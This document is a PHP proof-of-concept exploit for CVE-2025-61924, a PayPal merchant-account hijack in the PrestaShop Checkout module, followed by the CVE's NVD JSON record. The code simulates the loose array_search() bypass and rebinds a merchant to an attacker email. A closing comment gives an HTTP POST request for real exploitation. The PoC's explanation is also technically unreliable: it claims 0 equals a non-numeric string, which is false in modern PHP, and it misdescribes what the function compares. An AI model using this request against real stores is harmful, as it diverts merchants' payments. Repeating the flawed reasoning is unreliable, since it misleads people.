CVE-2025-61924

<?php /** * CVE-2025-61924 - PrestaShop Checkout PayPal Merchant Account Hijacking PoC * * The vulnerability is due to incorrect usage of PHP array_search() without strict comparison. * An authenticated high-privilege user (backoffice admin) can hijack the target PayPal merchant * account by manipulating the merchant ID parameter. * * NOTE: This PoC demonstrates the conceptual exploitation logic. * Actual exploitation requires valid backoffice credentials. */ // Simulated vulnerable code pattern in PrestaShop Checkout module class PsCheckoutMerchant { // Simulated list of authorized PayPal merchant IDs private $authorizedMerchantIds = [ 'MBR001' => '[email protected]', 'MBR002' => '[email protected]', ]; /** * Vulnerable function - uses array_search() without strict comparison (no third parameter) * This allows type juggling attacks */ public function vulnerableLookup($inputMerchantId) { // Without strict mode (true), array_search() performs loose comparison // 0 == 'any_string' evaluates to true in PHP $key = array_search($inputMerchantId, $this->authorizedMerchantIds); return $key; } /** * Vulnerable merchant account binding logic */ public function bindMerchantAccount($submittedMerchantId, $attackerPaypalEmail) { $matchedKey = $this->vulnerableLookup($submittedMerchantId); if ($matchedKey !== false) { // Bypass: if attacker submits integer 0, array_search returns 'MBR001' // due to loose comparison: 0 == 'MBR001' is true echo "[+] Matched merchant key: $matchedKey\n"; echo "[+] Binding attacker PayPal account: $attackerPaypalEmail\n"; // Hijack successful - update the merchant binding $this->authorizedMerchantIds[$matchedKey] = $attackerPaypalEmail; return true; } return false; } } // Exploitation demonstration $psCheckout = new PsCheckoutMerchant(); // Normal request would be: merchant_id=MBR001 // Malicious request: merchant_id=0 (integer, exploits loose comparison) // In PHP: array_search(0, ['MBR001' => '...', 'MBR002' => '...']) returns 'MBR001' // because 0 == 'MBR001' evaluates to true (loose comparison) $maliciousMerchantId = 0; // Integer 0 bypasses the check $attackerEmail = '[email protected]'; echo "[*] CVE-2025-61924 Exploitation PoC\n"; $result = $psCheckout->bindMerchantAccount($maliciousMerchantId, $attackerEmail); if ($result) { echo "[!] SUCCESS: PayPal merchant account hijacked!\n"; echo "[!] All future payments will be routed to: $attackerEmail\n"; } else { echo "[-] Exploitation failed\n"; } /** * HTTP-level exploitation example (for actual exploitation): * * POST /admin123/index.php?controller=AdminPsCheckoutMerchant * Cookie: PHPSESSID=<valid_admin_session> * Content-Type: application/x-www-form-urlencoded * * id_merchant=0&[email protected]&action=update * * The 'id_merchant=0' parameter exploits the array_search() loose comparison * vulnerability to hijack the first merchant account in the list. */ ?>

{"cve": {"id": "CVE-2025-61924", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:39.140", "lastModified": "2025-12-29T20:06:15.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PrestaShop Checkout is the PrestaShop official payment module in partnership with PayPal. In versions prior to 4.4.1 and 5.0.5, the Target PayPal merchant account hijacking from backoffice due to wrong usage of the PHP array_search(). The vulnerability is fixed in versions 4.4.1 and 5.0.5. No known workarounds exist."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-184"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionEndExcluding": "7.4.4.1", "matchCriteriaId": "4A067D2B-B83F-4AC5-830A-077589B9F27A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionStartIncluding": "7.5.0.1", "versionEndExcluding": "7.5.0.5", "matchCriteriaId": "36D48F64-2C0D-4DF7-9FBB-26FF21B9C71B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.4.4.1", "matchCriteriaId": "78BB8AD6-68E4-426F-B9D9-1810D37193D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionStartIncluding": "8.5.0.0", "versionEndExcluding": "8.5.0.5", "matchCriteriaId": "CF84DA7C-A801-4366-8463-F6FD21A69263"}, {"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionStartIncluding": "9.4.3.1", "versionEndExcluding": "9.5.0.5", "matchCriteriaId": "FBB531A1-D85B-4987-89FB-EC28C974301F"}]}]}], "references": [{"url": "https://github.com/PrestaShopCorp/ps_checkout/security/advisories/GHSA-wvpg-4wrh-5889", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}